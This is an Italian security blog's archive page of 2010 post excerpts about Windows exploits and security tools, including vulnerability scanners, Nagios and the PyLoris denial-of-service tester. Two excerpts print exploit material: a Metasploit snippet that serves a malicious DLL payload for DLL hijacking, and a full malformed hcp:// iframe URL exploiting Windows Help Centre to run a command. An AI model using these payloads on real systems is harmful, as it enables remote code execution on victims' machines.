Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Archivio: ‘Windows’

Tools for search DLL Hijacking Vulnerabilities

settembre 2nd, 2010 by clshack

Maggiori info su questa vulnerabilità, le possiamo trovare qui:

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Vediamo ora come cercare applicazioni vulnerabili :D


Sempre nell’articolo sopra citato, ho mostrato come con metasploit è possibile sfruttare questa vulnerabilità, sfruttando webdav, anche da remoto.

L’exploit creato da HD moore, sviluppatore metaploit è molto semplice.
Il codice che interessa a noi è:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end


(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 2 Comments »

[EXPLOIT]Windows Help Centre Remote code Excution

giugno 10th, 2010 by clshack

Un altro exploit per windows, che permette l’esecuzione di comandi sul pc della vittima.
Bisogna passare a linux :D

Ma vediamo come funziona questo exploit, chiamato:
Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

Questo exploit, sfruttando i file asx possiamo aprire il windows help con un url malformato e far aprire ad esempio la
calcolatrice :D

I file asx, sono:

An ASX file (Advanced Stream Redirector) is a special type of file which works closely with Windows Media ASF files.

L’url malformato in questione è composto cosi:
<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E">
(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 1 Comment »

[tutorial]Tool for Vulnerability Identification level Server

giugno 9th, 2010 by clshack

Dopo queste:
[tutorial]Tool for Network Mapping
[tutorial]Tool for Information Gathering
Ora parleremo di Tool for Vulnerability Identification level Server.

Categoria distinta a livello server, non farò come in backtrack che mettono tutto assieme, tool per l’sql injection assieme a tool per l’exploited di vulnerabilità a livello server, cioènon di applicazzioni web, per quello che posso cerco di dividere.
Penso che dopo si capisca anche meglio…
Sicuramente, non metterò mai tool come wapiti insieme a tool come openvas.

Per questa categoria, ho selezionato questi tools:

  • nessus
  • openvas
  • Checkpwd
  • Nikto
  • OpenSSL-Scanner
  • Onesixtyone
  • ettercap
  • medusa2

Purtroppo non posso soffermarmi su tutti questi ottimi tool, comunque il loro funzionamento è abbastanza semplice :D e se googlate un po’ troverete :D
(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Software, Windows | 1 Comment »

Wapiti: Web application security Scanner

maggio 30th, 2010 by clshack

Questo ottimo scanner per siti web, scritto in python e opensource è un’ottima alternativa ad acunetix.

Grazie a wapiti, potremo testare le vulnerabilità dei nostri siti web, in modo automatico ;)

Dal sito ufficiale, ecco cosa ci offre wapiti:

Wapiti is a vulnerability scanner for web applications.
It currently search vulnerabilities like XSS, SQL and XPath injections, file inclusions, command execution, LDAP injections, CRLF injections…
It use the Python programming language.


Wapiti, può individuare le seguenti vulnerabilità:
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software, Windows | 2 Comments »

Grendel-Scan:web application security testing tool

aprile 30th, 2010 by clshack

Questo programma, non lo conoscevo affatto, fino che un membro della rbt-4 community, non l’ha menzionato e così dopo varie prove, sono rimasto soddisfatto.
Grendel-scan, è un software tipo acunetix dico lui, perchè tutti lo conoscono, ma gratuito e open source, oltre al fatto di essere multipiattaforma.

(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software, Windows | 4 Comments »

WhatWeb, uno Scanner di WebSite di nuova generazione

aprile 23rd, 2010 by clshack

Andrew Horton, autore di WhatWeb sembra aver letto nel mio pensiero.

Infatti ha creato un nuovo scanner che non si basa più sul provare vulnerabilità in siti web sfruttando i parametri in input(acunetix bah), che risulta alquanto macchinoso e per lo più se provato su cms tipo wordpress INUTILE.


WhatWeb, individua i cms, piattaforme di blogging, stats / pacchetti di analisi dei dati, le librerie javascript, server e altro ancora.
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software, Windows | 3 Comments »

RATS: Rough Auditing Tool for Security

aprile 22nd, 2010 by clshack

RATS sinonimo di, Rough Auditing Tool for Security è tool, in grado di scansionare applicazioni C, C++, php, python e perl al fine di individuare BUG in esse.

RATS, a differenza dei soliti scanner, come skipfish o altri, lavora come pixy cioè esegue una ricerca delle funzioni che se usate in malo modo => stupidità umana o senza accorgimenti, possono risultare pericolose nel sourcecode.
Naturalmente RATS, non è intelligentissimo, quindi può segnarci dei falsi positivi, ma comunque, ricontrollare non fa mai male.
RATS, è disponibile, sia per sistemi windows che per sistemi linux.

Vediamo come installarlo e utilizzarlo su linux, nel mio caso lubuntu :D
(continua…)

Tags: , , , ,
Posted in GNU/Linux, Hacking, Software, Windows | 3 Comments »

Nagios: monitorare la rete su linux :)

aprile 15th, 2010 by clshack

Uno degli strumenti di controllo della rete più completi che mi sia mai capitato sotto mano su ubuntu/linux è NAGIOS.

Con nagios è possibile monitorare tutto ed è facilmente installabile per distribuzioni debian.

Nagios è uno strumento di rete in grado di controllare qualsiasi pacchetto in transito nel nostro computer e di fornire dettagli sulle interfacce configurate (LAN, Wifi, ecc.) e moltro altro ancora.

Da wikipedia:

Nagios è una nota applicazione open source per il monitoraggio di computer e risorse di rete. La sua funzione base è quella di controllare nodi, reti e servizi specificati, avvertendo quando questi non garantiscono il loro servizio o quando ritornano attivi.

Info Generali:

  • Monitoraggio di servizi di rete (SMTP, POP3, HTTP, NNTP, ICMP, SNMP, FTP, SSH)
  • Monitoraggio delle risorse di sistema (carico del processore, uso dell’hard disk, log di sistema sulla maggior parte dei sistemi operativi, anche per Microsoft Windows NRPE_NT).
  • Monitoraggio remoto supportato attraverso SSH o SSL encrypted tunnels.

    • (continua…)

Tags: , ,
Posted in GNU/Linux, Software, Windows | 2 Comments »

PyLoris 3.0: for testing a Denial of Service (DoS) attack

aprile 10th, 2010 by clshack

Avevo già parlato di Pyloris qui:
Pyloris,l’evoluzione in python di slowloris
Che è giunto alla versione 3.0.
In breve, pyloris è un tool per provare se un web server, come ad esempio apache è configurato opportunamente per resistere ad attacchi denial of services.
Nessun web server se non aggiornato/ configurato correttamente e o protetto da firewall/script/programmi che riescono a fermare questi attacchi è vulnerabile.

Dal sito ufficiale:

“PyLoris is a tool for testing a web server’s vulnerability to Denial of Service (DoS) attacks. It uses the Slowloris method; by using all available connections web servers cannot complete valid requests. Supports SOCKS, SSL, and all HTTP request methods.”

Ad esempio il server web della mia scuola :(

Queste sono le nuove caratteristiche di pyloris 3.0:

  • Tkinter GUI
  • Scripting API
  • Inteligent Thread & Exception Handling

    • (continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software, Windows | 6 Comments »

CMS Explorer: Analizza i CMS e cerca BUG

aprile 9th, 2010 by clshack

CMS Explorer è un ottimo tool per analizzare, esplorare un cms supportato dal programma.

CMS Explorer è stato progettato per rivelare i moduli, plugin,
componenti e temi che un sito web con un determinato cms “monta”.

CMS Explorer può esserci davvero utile per la ricerca di bug nel nostro cms.
CMS Explorer, sfrutta anche il sito di osvdb per recuperare relative informazioni sulla versione del prodotto usato e le sue relative vulnerabilità.
Dopo, al massimo potete anche utilizzare il mio exploit finder :)


CMS Explorer attualmente, supporta questi cms:

  • Drupal
  • WordPress
  • Joomla
  • Mambo

(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software, Windows | 1 Comment »
« Older Entries